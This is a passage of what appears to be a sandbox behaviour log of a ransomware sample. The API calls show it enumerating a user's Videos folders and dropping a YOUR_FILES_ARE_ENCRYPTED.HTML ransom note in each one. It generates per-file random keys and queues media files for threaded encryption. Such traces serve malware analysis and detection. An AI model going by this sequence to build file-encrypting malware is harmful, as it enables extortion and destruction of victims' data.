pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 92 [0168.865] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\YOUR_FILES_ARE_ENCRYPTED.HTML" 
(normalized: "c:\\users\\5alr3u30d3\\videos\\5so4gw775l6f\\ff3anzodeddnbufszh\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0168.865] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0168.867] CloseHandle (hObject=0x5e4) returned 1 [0168.868] GetProcessHeap () returned 0x270000 [0168.868] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x749a470 | out: hHeap=0x270000) returned 1 [0168.868] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21774d00, ftCreationTime.dwHighDateTime=0x1d7d9df, ftLastAccessTime.dwLowDateTime=0xe46e3180, ftLastAccessTime.dwHighDateTime=0x1d7deb6, ftLastWriteTime.dwLowDateTime=0xe46e3180, ftLastWriteTime.dwHighDateTime=0x1d7deb6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x161fafa, dwReserved1=0x0, cFileName="ff3aNZOdEdDnbufSZH", cAlternateFileName="FF3ANZ~1")) returned 0 [0168.868] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0168.868] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0168.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\videos\\5so4gw775l6f\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0168.869] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, 
lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0168.871] CloseHandle (hObject=0x5ac) returned 1 [0168.871] GetProcessHeap () returned 0x270000 [0168.872] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: hHeap=0x270000) returned 1 [0168.872] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b347d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0168.872] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\desktop.ini") returned 42 [0168.872] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.872] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0168.872] lstrlenW (lpString=".ini") returned 4 [0168.872] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0168.872] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47cb23d0, ftCreationTime.dwHighDateTime=0x1d7d92d, ftLastAccessTime.dwLowDateTime=0x6c3c8e10, ftLastAccessTime.dwHighDateTime=0x1d7e0d6, ftLastWriteTime.dwLowDateTime=0x6c3c8e10, ftLastWriteTime.dwHighDateTime=0x1d7e0d6, nFileSizeHigh=0x0, nFileSizeLow=0xa4a0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="fN8HPB62F.flv", cAlternateFileName="FN8HPB~1.FLV")) returned 1 [0168.872] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\fN8HPB62F.flv") returned 44 [0168.872] lstrcmpW (lpString1="fN8HPB62F.flv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.872] PathFindExtensionW (pszPath="fN8HPB62F.flv") returned=".flv" [0168.872] lstrlenW (lpString=".flv") returned 4 [0168.872] PathFindExtensionW (pszPath="fN8HPB62F.flv") returned=".flv" [0168.872] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0168.872] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\fN8HPB62F.flv" (normalized: "c:\\users\\5alr3u30d3\\videos\\fn8hpb62f.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0168.873] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=42144) returned 1 [0168.873] GetProcessHeap () returned 0x270000 [0168.873] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75e0048 [0168.876] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="92") returned 2 [0168.876] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="94") returned 2 [0168.876] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="E5") returned 2 [0168.876] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="B1") returned 2 [0168.876] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="87") returned 2 [0168.876] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="85") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="8D") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="87") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="56") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="C3") returned 2 [0168.877] 
wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="76") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="28") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="C0") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="FC") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="E7") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="6F") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="38") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="B3") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="D8") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="FB") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="D3") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="76") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="41") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="E4") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="9F") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="2B") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="01") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="75") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="81") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="4B") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="1A") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: 
param_1="16") returned 2 [0168.878] lstrcpyW (in: lpString1=0x75f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\fN8HPB62F.flv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\fN8HPB62F.flv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\fN8HPB62F.flv" [0168.878] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x75e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.878] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75e0048, lpOverlapped=0x75e0048) returned 1 [0168.878] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9ab25450, ftCreationTime.dwHighDateTime=0x1d7e61c, ftLastAccessTime.dwLowDateTime=0xcf4e4c90, ftLastAccessTime.dwHighDateTime=0x1d7e73f, ftLastWriteTime.dwLowDateTime=0xcf4e4c90, ftLastWriteTime.dwHighDateTime=0x1d7e73f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="GaX8iFuHaRl", cAlternateFileName="GAX8IF~1")) returned 1 [0168.878] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl") returned 42 [0168.878] GetProcessHeap () returned 0x270000 [0168.878] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0168.878] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl" [0168.878] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl\\*" [0168.878] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl\\*", 
lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9ab25450, ftCreationTime.dwHighDateTime=0x1d7e61c, ftLastAccessTime.dwLowDateTime=0xcf4e4c90, ftLastAccessTime.dwHighDateTime=0x1d7e73f, ftLastWriteTime.dwLowDateTime=0xcf4e4c90, ftLastWriteTime.dwHighDateTime=0x1d7e73f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe7a6e88, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0168.879] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9ab25450, ftCreationTime.dwHighDateTime=0x1d7e61c, ftLastAccessTime.dwLowDateTime=0xcf4e4c90, ftLastAccessTime.dwHighDateTime=0x1d7e73f, ftLastWriteTime.dwLowDateTime=0xcf4e4c90, ftLastWriteTime.dwHighDateTime=0x1d7e73f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe7a6e88, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0168.879] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56dcd1a0, ftCreationTime.dwHighDateTime=0x1d7e4d8, ftLastAccessTime.dwLowDateTime=0x597bcc20, ftLastAccessTime.dwHighDateTime=0x1d7e5ac, ftLastWriteTime.dwLowDateTime=0x597bcc20, ftLastWriteTime.dwHighDateTime=0x1d7e5ac, nFileSizeHigh=0x0, nFileSizeLow=0xedf9, dwReserved0=0xfe7a6e88, dwReserved1=0xffffffff, cFileName="dfCFe1F6XdsX.avi", cAlternateFileName="DFCFE1~1.AVI")) returned 1 [0168.879] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl\\dfCFe1F6XdsX.avi") returned 59 [0168.879] lstrcmpW (lpString1="dfCFe1F6XdsX.avi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.879] PathFindExtensionW (pszPath="dfCFe1F6XdsX.avi") returned=".avi" [0168.879] lstrlenW (lpString=".avi") returned 4 [0168.879] PathFindExtensionW 
(pszPath="dfCFe1F6XdsX.avi") returned=".avi" [0168.879] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0168.879] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl\\dfCFe1F6XdsX.avi" (normalized: "c:\\users\\5alr3u30d3\\videos\\gax8ifuharl\\dfcfe1f6xdsx.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x4a8 [0168.879] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=60921) returned 1 [0168.879] GetProcessHeap () returned 0x270000 [0168.879] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76091a8 [0168.883] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="DA") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="29") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="88") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="5B") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="28") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="F9") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="F9") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="72") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="46") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="5A") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="7F") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="1D") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="59") returned 2 [0168.883] wsprintfW (in: 
param_1=0x4ebda6a, param_2="%02X" | out: param_1="27") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="10") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="2A") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="FA") returned 2 [0168.884] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="B4") returned 2 [0168.884] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="7E") returned 2 [0168.884] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="F1") returned 2 [0168.884] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="7D") returned 2 [0168.884] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="8A") returned 2 [0168.884] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="98") returned 2 [0168.884] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="40") returned 2 [0168.884] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="3E") returned 2 [0168.884] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="93") returned 2 [0168.884] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="A4") returned 2 [0168.884] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="19") returned 2 [0168.884] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="EB") returned 2 [0168.884] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="E9") returned 2 [0168.884] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="9F") returned 2 [0168.884] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="7E") returned 2 [0168.884] lstrcpyW (in: lpString1=0x761925c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl\\dfCFe1F6XdsX.avi" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl\\dfCFe1F6XdsX.avi") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl\\dfCFe1F6XdsX.avi" [0168.884] CreateIoCompletionPort (FileHandle=0x4a8, ExistingCompletionPort=0x3a0, CompletionKey=0x76091a8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.885] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76091a8, lpOverlapped=0x76091a8) returned 1 [0168.885] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x736f4f50, ftCreationTime.dwHighDateTime=0x1d7de7a, ftLastAccessTime.dwLowDateTime=0x9e28d6b0, ftLastAccessTime.dwHighDateTime=0x1d7e359, ftLastWriteTime.dwLowDateTime=0x9e28d6b0, ftLastWriteTime.dwHighDateTime=0x1d7e359, nFileSizeHigh=0x0, nFileSizeLow=0xb2fe, dwReserved0=0xfe7a6e88, dwReserved1=0xffffffff, cFileName="eZBMqRDX_SY1Cjf.swf", cAlternateFileName="EZBMQR~1.SWF")) returned 1 [0168.885] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl\\eZBMqRDX_SY1Cjf.swf") returned 62 [0168.885] lstrcmpW (lpString1="eZBMqRDX_SY1Cjf.swf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.885] PathFindExtensionW (pszPath="eZBMqRDX_SY1Cjf.swf") returned=".swf" [0168.885] lstrlenW (lpString=".swf") returned 4 [0168.885] PathFindExtensionW (pszPath="eZBMqRDX_SY1Cjf.swf") returned=".swf" [0168.885] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81dc4c20, ftCreationTime.dwHighDateTime=0x1d7de05, ftLastAccessTime.dwLowDateTime=0xc861c640, ftLastAccessTime.dwHighDateTime=0x1d7e1ff, ftLastWriteTime.dwLowDateTime=0xc861c640, ftLastWriteTime.dwHighDateTime=0x1d7e1ff, nFileSizeHigh=0x0, nFileSizeLow=0x13cb0, dwReserved0=0xfe7a6e88, dwReserved1=0xffffffff, cFileName="gXcjn.swf", cAlternateFileName="")) returned 1 [0168.885] wnsprintfW (in: 
pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl\\gXcjn.swf") returned 52 [0168.885] lstrcmpW (lpString1="gXcjn.swf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.885] PathFindExtensionW (pszPath="gXcjn.swf") returned=".swf" [0168.885] lstrlenW (lpString=".swf") returned 4 [0168.885] PathFindExtensionW (pszPath="gXcjn.swf") returned=".swf" [0168.885] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81dc4c20, ftCreationTime.dwHighDateTime=0x1d7de05, ftLastAccessTime.dwLowDateTime=0xc861c640, ftLastAccessTime.dwHighDateTime=0x1d7e1ff, ftLastWriteTime.dwLowDateTime=0xc861c640, ftLastWriteTime.dwHighDateTime=0x1d7e1ff, nFileSizeHigh=0x0, nFileSizeLow=0x13cb0, dwReserved0=0xfe7a6e88, dwReserved1=0xffffffff, cFileName="gXcjn.swf", cAlternateFileName="")) returned 0 [0168.885] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0168.885] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 72 [0168.885] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\videos\\gax8ifuharl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0168.886] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0168.888] CloseHandle (hObject=0x5e4) returned 1 [0168.888] GetProcessHeap () returned 0x270000 [0168.889] HeapFree (in: hHeap=0x270000, dwFlags=0x0, 
lpMem=0x74081a0 | out: hHeap=0x270000) returned 1 [0168.889] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48e18300, ftCreationTime.dwHighDateTime=0x1d7e287, ftLastAccessTime.dwLowDateTime=0xf92b10c0, ftLastAccessTime.dwHighDateTime=0x1d7e645, ftLastWriteTime.dwLowDateTime=0xf92b10c0, ftLastWriteTime.dwHighDateTime=0x1d7e645, nFileSizeHigh=0x0, nFileSizeLow=0x17230, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="IvgoCQULr.mp4", cAlternateFileName="IVGOCQ~1.MP4")) returned 1 [0168.889] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\IvgoCQULr.mp4") returned 44 [0168.889] lstrcmpW (lpString1="IvgoCQULr.mp4", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.889] PathFindExtensionW (pszPath="IvgoCQULr.mp4") returned=".mp4" [0168.889] lstrlenW (lpString=".mp4") returned 4 [0168.889] PathFindExtensionW (pszPath="IvgoCQULr.mp4") returned=".mp4" [0168.889] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0168.889] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\IvgoCQULr.mp4" (normalized: "c:\\users\\5alr3u30d3\\videos\\ivgocqulr.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0168.890] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=94768) returned 1 [0168.890] GetProcessHeap () returned 0x270000 [0168.890] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7631300 [0168.893] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="92") returned 2 [0168.893] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="86") returned 2 [0168.893] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: 
param_1="39") returned 2 [0168.893] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="1A") returned 2 [0168.893] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="BF") returned 2 [0168.893] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="37") returned 2 [0168.893] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="FF") returned 2 [0168.893] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="BF") returned 2 [0168.893] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="E2") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="BE") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="AE") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="21") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="55") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="B9") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="70") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="28") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="5E") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="FC") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="7F") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="EB") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="E4") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="E4") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="E6") returned 2 [0168.894] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="C3") returned 2 [0168.894] wsprintfW (in: 
